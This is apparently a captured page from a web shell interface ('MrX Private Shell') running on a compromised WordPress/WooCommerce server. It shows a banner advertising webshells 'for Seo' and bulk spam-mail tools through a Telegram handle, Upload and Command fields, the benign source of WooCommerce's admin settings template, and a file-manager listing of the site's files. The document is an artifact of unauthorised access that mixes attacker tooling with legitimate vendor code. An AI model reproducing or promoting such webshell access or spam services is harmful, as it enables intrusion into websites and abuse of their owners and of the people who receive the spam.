__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Admin View: Settings
 *
 * This file is included in WC_Admin_Settings::output().
 *
 * @package WooCommerce
 */

// phpcs:disable WooCommerce.Commenting.CommentHooks.MissingHookComment

use Automattic\WooCommerce\Admin\Features\Features;
use Automattic\WooCommerce\Utilities\FeaturesUtil;

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * The current WC admin settings tab ID.
 *
 * @var string $current_tab
 */

/**
 * The current WC admin settings section ID.
 *
 * @var string $current_section
 */

$tab_exists        = isset( $tabs[ $current_tab ] ) || has_action( 'woocommerce_sections_' . $current_tab ) || has_action( 'woocommerce_settings_' . $current_tab ) || has_action( 'woocommerce_settings_tabs_' . $current_tab );
$current_tab_label = isset( $tabs[ $current_tab ] ) ? $tabs[ $current_tab ] : '';

if ( ! $tab_exists ) {
	wp_safe_redirect( admin_url( 'admin.php?page=wc-settings' ) );
	exit;
}

$hide_nav = 'checkout' === $current_tab && in_array( $current_section, array( 'offline', 'bacs', 'cheque', 'cod' ), true );

// Move 'Advanced' to the last.
if ( array_key_exists( 'advanced', $tabs ) ) {
	$advanced = $tabs['advanced'];
	unset( $tabs['advanced'] );
	// phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited
	$tabs['advanced'] = $advanced;
}

?>

<div class="wrap woocommerce">
	<?php do_action( 'woocommerce_before_settings_' . $current_tab ); ?>
	<form method="<?php echo esc_attr( apply_filters( 'woocommerce_settings_form_method_tab_' . $current_tab, 'post' ) ); ?>" id="mainform" action="" enctype="multipart/form-data">
		<?php if ( ! $hide_nav ) : ?>
			<nav class="nav-tab-wrapper woo-nav-tab-wrapper">
				<?php

				foreach ( $tabs as $slug => $label ) {
					echo '<a href="' . esc_html( admin_url( 'admin.php?page=wc-settings&tab=' . esc_attr( $slug ) ) ) . '" class="nav-tab ' . ( $current_tab === $slug ? 'nav-tab-active' : '' ) . '">' . esc_html( $label ) . '</a>';
				}

				/**
				 * Hook for adding additional settings tabs.
				 *
				 * @since 1.0.0
				 */
				do_action( 'woocommerce_settings_tabs' );

				?>
			</nav>
		<?php endif; ?>
			<h1 class="screen-reader-text"><?php echo esc_html( $current_tab_label ); ?></h1>
			<?php
				do_action( 'woocommerce_sections_' . $current_tab );

				WC_Admin_Settings::show_messages();

				do_action( 'woocommerce_settings_' . $current_tab );
				do_action( 'woocommerce_settings_tabs_' . $current_tab ); // @deprecated 3.4.0 hook.
			?>
			<p class="submit">
				<?php if ( empty( $GLOBALS['hide_save_button'] ) ) : ?>
					<button name="save" disabled class="woocommerce-save-button components-button is-primary" type="submit" value="<?php esc_attr_e( 'Save changes', 'woocommerce' ); ?>"><?php esc_html_e( 'Save changes', 'woocommerce' ); ?></button>
				<?php endif; ?>
				<?php wp_nonce_field( 'woocommerce-settings' ); ?>
			</p>
	</form>
	<?php do_action( 'woocommerce_after_settings_' . $current_tab ); ?>
</div>

Filemanager

Name Type Size Permission Actions
html-admin-dashboard-setup.php File 2.02 KB 0664
html-admin-page-addons-category-nav.php File 1.08 KB 0664
html-admin-page-product-export.php File 5.55 KB 0664
html-admin-page-reports.php File 2.39 KB 0664
html-admin-page-status-logs-db.php File 1.85 KB 0664
html-admin-page-status-logs.php File 2.17 KB 0664
html-admin-page-status-report.php File 58.58 KB 0664
html-admin-page-status-tools.php File 2.23 KB 0664
html-admin-page-status.php File 1.25 KB 0664
html-admin-settings.php File 2.87 KB 0664
html-bulk-edit-product.php File 13.44 KB 0664
html-email-template-preview.php File 1.05 KB 0664
html-notice-base-table-missing.php File 1.57 KB 0664
html-notice-custom.php File 452 B 0664
html-notice-download-dir-sync-complete.php File 1.18 KB 0664
html-notice-install.php File 732 B 0664
html-notice-legacy-shipping.php File 1.68 KB 0664
html-notice-maxmind-license-key.php File 1.15 KB 0664
html-notice-no-shipping-methods.php File 1.28 KB 0664
html-notice-redirect-only-download.php File 1.2 KB 0664
html-notice-regenerating-lookup-table.php File 1.17 KB 0664
html-notice-regenerating-thumbnails.php File 618 B 0664
html-notice-secure-connection.php File 848 B 0664
html-notice-template-check.php File 1.68 KB 0664
html-notice-update.php File 1.35 KB 0664
html-notice-updated.php File 660 B 0664
html-notice-updating.php File 1.12 KB 0664
html-notice-uploads-directory-is-unprotected.php File 1.03 KB 0664
html-notice-wp-php-minimum-requirements.php File 933 B 0664
html-quick-edit-product.php File 8.38 KB 0664
html-report-by-date.php File 4.1 KB 0664
Filemanager